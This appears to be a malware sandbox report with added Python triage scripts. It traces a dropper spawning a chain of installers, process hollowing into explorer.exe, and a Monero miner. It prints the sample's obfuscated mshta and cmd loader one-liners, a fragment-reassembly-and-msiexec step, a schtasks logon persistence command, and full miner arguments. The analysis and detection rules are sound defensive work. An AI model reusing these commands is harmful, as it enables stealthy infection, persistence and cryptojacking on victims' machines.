PID 2740 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2740 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2740 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2740 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2740 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2740 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2552 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp
PID 2552 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp
PID 2552 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp
PID 2552 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp
PID 2552 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp
PID 2552 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp
PID 2552 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp
PID 2740 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
PID 2740 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
PID 2740 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
PID 2740 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
PID 1724 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1724 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1724 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1724 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1724 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1724 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1724 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 2904 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe C:\Windows\SysWOW64\mshta.exe
PID 2904 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe C:\Windows\SysWOW64\mshta.exe
PID 2904 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe C:\Windows\SysWOW64\mshta.exe
PID 2904 wrote to memory of 2428 N/A C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe C:\Windows\SysWOW64\mshta.exe
PID 2740 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\8.exe
PID 2740 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\8.exe
PID 2740 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\8.exe
PID 2740 wrote to memory of 2404 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\8.exe
PID 2892 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp
PID 2892 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp
PID 2892 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp
PID 2892 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp
PID 2892 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp
PID 2892 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp
PID 2892 wrote to memory of 1880 N/A C:\Users\Admin\AppData\Local\Temp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp
PID 2740 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
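The two tables above log one row per API call, which is why the dropper (PID 2740) appears four or seven times for each child it starts. Collapsing the rows rebuilds the spawn chain (dropper, then setup.exe to its Inno Setup setup.tmp and back, then search_hyperfs_206.exe to mshta.exe) and isolates the one row that is not bookkeeping: conhost.exe (1984) calling SetThreadContext on explorer.exe (2656), the process that later carries the miner command line. A console host has no legitimate reason to set the thread context of explorer.exe; paired with a prior write into the target that is the classic process-hollowing sequence. The script below is an added example, not part of this report or of any sandbox's tooling. It parses a subset of the rows above, copied verbatim, and assumes (which the rows suggest but the report does not state) that a WriteProcessMemory row from a parent to a process it has just created tracks the spawn rather than a separate injection.

```python
import re
from collections import Counter, defaultdict
from dataclasses import dataclass

# Rows copied verbatim from the "Suspicious use of SetThreadContext" and
# "Suspicious use of WriteProcessMemory" tables of this report (a subset;
# some repeats are kept on purpose so the collapsing step has work to do).
DROPPER = r"C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe"
TEMP = r"C:\Users\Admin\AppData\Local\Temp"
SIGNATURE_ROWS = "\n".join([
    r"PID 1984 set thread context of 2656 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe",
    rf"PID 2740 wrote to memory of 2704 N/A {DROPPER} {TEMP}\BCleanSoft86.exe",
    rf"PID 2740 wrote to memory of 2704 N/A {DROPPER} {TEMP}\BCleanSoft86.exe",
    rf"PID 2740 wrote to memory of 2704 N/A {DROPPER} {TEMP}\BCleanSoft86.exe",
    rf"PID 2740 wrote to memory of 2552 N/A {DROPPER} {TEMP}\setup.exe",
    rf"PID 2552 wrote to memory of 1724 N/A {TEMP}\setup.exe {TEMP}\is-C64EI.tmp\setup.tmp",
    rf"PID 1724 wrote to memory of 2892 N/A {TEMP}\is-C64EI.tmp\setup.tmp {TEMP}\setup.exe",
    rf"PID 2740 wrote to memory of 2904 N/A {DROPPER} {TEMP}\search_hyperfs_206.exe",
    rf"PID 2904 wrote to memory of 2428 N/A {TEMP}\search_hyperfs_206.exe C:\Windows\SysWOW64\mshta.exe",
    rf"PID 2740 wrote to memory of 2072 N/A {DROPPER} {TEMP}\Calculator Installation.exe",
    rf"PID 2740 wrote to memory of 2552 N/A {DROPPER} {TEMP}\setup.exe",
])

# Source image is matched lazily up to its .exe/.tmp suffix so a target path
# containing a space ("Calculator Installation.exe") still lands in dst_img.
ROW = re.compile(
    r"^PID (?P<src>\d+) (?P<kind>wrote to memory of|set thread context of) (?P<dst>\d+) "
    r"N/A (?P<src_img>.+?\.(?:exe|tmp)) (?P<dst_img>.+)$"
)


@dataclass(frozen=True)
class Edge:
    kind: str       # "write" or "thread_context"
    src: int
    dst: int
    src_img: str
    dst_img: str


def basename(path):
    return path.rsplit("\\", 1)[-1]


def parse_rows(text):
    edges = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        kind = "write" if m["kind"].startswith("wrote") else "thread_context"
        edges.append(Edge(kind, int(m["src"]), int(m["dst"]), m["src_img"], m["dst_img"]))
    return edges


def collapse(edges):
    """One sandbox row per API call; count them per (kind, src, dst) edge."""
    return Counter((e.kind, e.src, e.dst) for e in edges)


def image_map(edges):
    imgs = {}
    for e in edges:
        imgs.setdefault(e.src, e.src_img)
        imgs.setdefault(e.dst, e.dst_img)
    return imgs


def process_tree(edges):
    """Parent -> children, taken from the write rows (assumed to track spawning)."""
    tree = defaultdict(set)
    for e in edges:
        if e.kind == "write":
            tree[e.src].add(e.dst)
    return dict(tree)


def roots(edges):
    tree = process_tree(edges)
    children = {c for kids in tree.values() for c in kids}
    return sorted(p for p in tree if p not in children)


def render(tree, imgs, pid, depth=0):
    """Indented text tree, one process per line, rooted at pid."""
    lines = ["  " * depth + f"{pid} {basename(imgs.get(pid, '?'))}"]
    for child in sorted(tree.get(pid, ())):
        lines.extend(render(tree, imgs, child, depth + 1))
    return lines


def hollowing_candidates(edges):
    """SetThreadContext from one image into a different image is the hollowing
    tell; report (src, dst, target image) where the basenames differ."""
    return [
        (e.src, e.dst, e.dst_img)
        for e in edges
        if e.kind == "thread_context"
        and basename(e.src_img).lower() != basename(e.dst_img).lower()
    ]


if __name__ == "__main__":
    edges = parse_rows(SIGNATURE_ROWS)
    imgs = image_map(edges)
    for root in roots(edges):
        print("\n".join(render(process_tree(edges), imgs, root)))
    for src, dst, img in hollowing_candidates(edges):
        print(f"hollowing candidate: {src} {basename(imgs[src])} -> {dst} {basename(img)}")
```

Run against the full tables the same way; the tree output makes the Inno Setup bounce (setup.exe -> setup.tmp -> setup.exe /SILENT -> setup.tmp) and the mshta spawn obvious, and the only hollowing candidate is the conhost.exe to explorer.exe pair.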

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe

"C:\Users\Admin\AppData\Local\Temp\96c9fde29860a0517d7c1c17de547fe6f64022603e400b0aff5166c4cfee2434.exe"

C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe

"C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"

C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe

"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"

C:\Users\Admin\AppData\Local\Temp\inst2.exe

"C:\Users\Admin\AppData\Local\Temp\inst2.exe"

C:\Users\Admin\AppData\Local\Temp\4.exe

"C:\Users\Admin\AppData\Local\Temp\4.exe"

C:\Users\Admin\AppData\Local\Temp\cxl-game.exe

"C:\Users\Admin\AppData\Local\Temp\cxl-game.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-C64EI.tmp\setup.tmp" /SL5="$7021A,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe

"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )

C:\Users\Admin\AppData\Local\Temp\8.exe

"C:\Users\Admin\AppData\Local\Temp\8.exe"

C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VL1BH.tmp\setup.tmp" /SL5="$A0192,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe

"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"

C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe

..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi

C:\Windows\SysWOW64\taskkill.exe

taskkill -f -iM "search_hyperfs_206.exe"

C:\Users\Admin\AppData\Local\Temp\Chrome4.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )

C:\Users\Admin\AppData\Local\Temp\Jonba.exe

"C:\Users\Admin\AppData\Local\Temp\Jonba.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" EcHo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1540 -s 1464

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y ..\lXQ2g.WC

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Roaming\services64.exe

C:\Users\Admin\AppData\Roaming\services64.exe

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.raw/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6CFvMg9MgC241sftmft2lYvgrdUwd08ilNkQ/lCe6+NW" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

C:\Users\Admin\AppData\Local\Temp\f78be40.exe

"C:\Users\Admin\AppData\Local\Temp\f78be40.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 536
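The command lines above carry the whole loader logic in the clear, so they are the best place to build detections from. search_hyperfs_206.exe starts mshta.exe with a vbscript: one-liner whose WScript.Shell.Run(..., 0, True) runs cmd hidden and waits; cmd copies the binary to ..\kPBhgOaGQk.exe, starts the copy with the token /PLQtzfgO0m8dRv4iYALOqi, and the If "" == "" branch kills the original only on that first pass: on the relaunch the token fills the left side (If "/PLQtzfgO0m8dRv4iYALOqi " == "") so the comparison is false and no taskkill runs, exactly as the second mshta/cmd pair shows. The relaunched copy then runs a second one-liner that writes the two bytes MZ into one fragment with set /p (no trailing newline), echoes a short trailer into another, joins seven fragments with copy /b into ..\LXQ2G.WC, deletes the working directory (the RarSFX1 fragments in the Files section), and loads the result with msiexec -Y, which calls the DLL's DllRegisterServer; the PE signature is supplied at assembly time rather than stored with the payload. Separately, cmd registers an onlogon task with /rl highest pointing at services64.exe under %APPDATA%, and explorer.exe ends up running XMRig-style arguments (--algo=rx/0, --url=xmr-eu2.nanopool.org:14433, --tls) with a 95-character Monero address as --user; the --cinit-* switches are not upstream XMRig options and point to a loader wrapper that idles the miner on a busy CPU (--cinit-idle-cpu=60, --cinit-idle-wait=5) and hides it (--cinit-stealth). The random casing throughout (cOpY, sTart, truE) only defeats case-sensitive string matching. The triage script below is an added example, not part of this report or of any sandbox; its rule names and thresholds are the author's, and its sample input is command lines copied from the Processes section (the explorer.exe line shortened to the switches the rules read).

```python
import re
from dataclasses import dataclass

# Command lines copied from the Processes section of this report.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )',
    r'"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC',
    r'schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"',
    r'C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.raw/password --pass= --cpu-max-threads-hint=30 --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth',
    r'"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT',  # ordinary installer switch; must not fire
]

# All patterns are case-insensitive because the sample randomises letter case.
MSHTA_INLINE = re.compile(r'mshta(?:\.exe)?"?\s+(?:vbscript|javascript):', re.I)
WSHELL_RUN = re.compile(r'wscript\.shell.{0,40}?\.\s*run\s*\(', re.I)
COPY_START_KILL = re.compile(r'copy\s+/y\s+.+?&&\s*start\s+.+?taskkill\s+[-/]f', re.I)
# Fragment names stop at whitespace or '+', so "WCWfZ1TN.MJ+ WCBG6.QA" splits correctly.
BINARY_CONCAT = re.compile(r'copy\s+/b\s+/y\s+([^\s+]+(?:\s*\+\s*[^\s+]+)+)\s+(\S+)', re.I)
MZ_STUB = re.compile(r'set\s*/p\s*=\s*"*MZ"*\s*>\s*(\S+)', re.I)
MSIEXEC_Y = re.compile(r'msiexec(?:\.exe)?\s+[-/]y\s+(\S+)', re.I)
DEL_ALL = re.compile(r'\bdel\s+/q\s+\*', re.I)
SCHTASKS = re.compile(r'schtasks\s+/create.*?/sc\s+(\w+).*?/rl\s+highest.*?/tr\s+"?([^"]+)"?', re.I)
USER_WRITABLE = re.compile(r'\\users\\[^\\]+\\appdata\\', re.I)
MINER_URL = re.compile(r'--url=([\w.-]+):(\d+)')
MINER_USER = re.compile(r'--user=([A-Za-z0-9]+)')
MINER_ALGO = re.compile(r'--algo="?([\w/]+)"?')
WRAPPER_FLAG = re.compile(r'--cinit-[\w-]+')


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def image_of(cmd):
    """First token of the command line, with surrounding quotes removed."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        return cmd[1:cmd.index('"', 1)]
    return cmd.split(None, 1)[0]


def concat_chain(cmd):
    """Pull apart a copy /b reassembly: fragment list, output, the MZ stub file,
    whether the fragments are wiped, and what msiexec -y is told to load."""
    m = BINARY_CONCAT.search(cmd)
    if not m:
        return None
    stub, load = MZ_STUB.search(cmd), MSIEXEC_Y.search(cmd)
    return {
        "parts": [p.strip() for p in m.group(1).split("+")],
        "output": m.group(2),
        "mz_stub": stub.group(1) if stub else None,
        "loaded_by_msiexec": load.group(1) if load else None,
        "deletes_fragments": bool(DEL_ALL.search(cmd)),
    }


def scheduled_task(cmd):
    m = SCHTASKS.search(cmd)
    if not m:
        return None
    target = m.group(2).strip()
    return {"schedule": m.group(1).lower(), "target": target,
            "user_writable": bool(USER_WRITABLE.search(target))}


def miner_config(cmd):
    """Pool, port, wallet and algorithm from XMRig-style switches, plus any
    --cinit-* switches, which upstream XMRig does not define."""
    url, user = MINER_URL.search(cmd), MINER_USER.search(cmd)
    if not (url and user):
        return None
    algo = MINER_ALGO.search(cmd)
    return {"pool": url.group(1), "port": int(url.group(2)), "wallet": user.group(1),
            "algo": algo.group(1) if algo else None, "tls": "--tls" in cmd.split(),
            "wrapper_flags": sorted(set(WRAPPER_FLAG.findall(cmd)))}


def triage(cmdlines):
    findings = []
    for cmd in cmdlines:
        image = image_of(cmd).lower()
        if MSHTA_INLINE.search(cmd) and WSHELL_RUN.search(cmd):
            findings.append(Finding("mshta-inline-script", image))
        if COPY_START_KILL.search(cmd):
            findings.append(Finding("self-relocate-and-kill", image))
        chain = concat_chain(cmd)
        if chain and chain["loaded_by_msiexec"]:
            findings.append(Finding("binary-concat-then-msiexec",
                                    f"{len(chain['parts'])} fragments -> {chain['output']}"))
        task = scheduled_task(cmd)
        if task and task["schedule"] == "onlogon" and task["user_writable"]:
            findings.append(Finding("schtasks-onlogon-userpath", task["target"]))
        miner = miner_config(cmd)
        if miner:
            rule = "miner-args-in-system-binary" if image.startswith("c:\\windows\\") else "miner-args"
            findings.append(Finding(rule, f"{miner['pool']}:{miner['port']} wallet={miner['wallet'][:8]}..."))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_CMDLINES):
        print(f"{f.rule:32} {f.detail}")
```

The rules are deliberately structural (mshta plus an inline script protocol, copy-then-start-then-taskkill, copy /b followed by msiexec -y, an onlogon task into a user-writable path, pool arguments on a binary under C:\Windows) rather than keyed on the random file names, which change per build; the setup.exe /SILENT line is included to show that a plain installer produces no findings.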

Network

Country Destination Domain Proto
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 fobe1.com udp
US 8.8.8.8:53 www.independent.co.uk udp
US 151.101.65.91:443 www.independent.co.uk tcp
US 151.101.65.91:443 www.independent.co.uk tcp
US 151.101.65.91:443 www.independent.co.uk tcp
US 151.101.65.91:443 www.independent.co.uk tcp
US 151.101.65.91:443 www.independent.co.uk tcp
US 151.101.65.91:443 www.independent.co.uk tcp
US 151.101.65.91:443 www.independent.co.uk tcp
US 151.101.65.91:443 www.independent.co.uk tcp
US 8.8.8.8:53 rss.nytimes.com udp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 8.8.8.8:53 mas.to udp
US 151.101.193.164:443 rss.nytimes.com tcp
US 172.67.166.96:443 mas.to tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 151.101.193.164:443 rss.nytimes.com tcp
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 whealclothing.xyz udp
US 8.8.8.8:53 c.pki.goog udp
NL 45.9.20.156:80 tcp
US 104.26.3.46:443 iplogger.org tcp
GB 142.250.187.227:80 c.pki.goog tcp
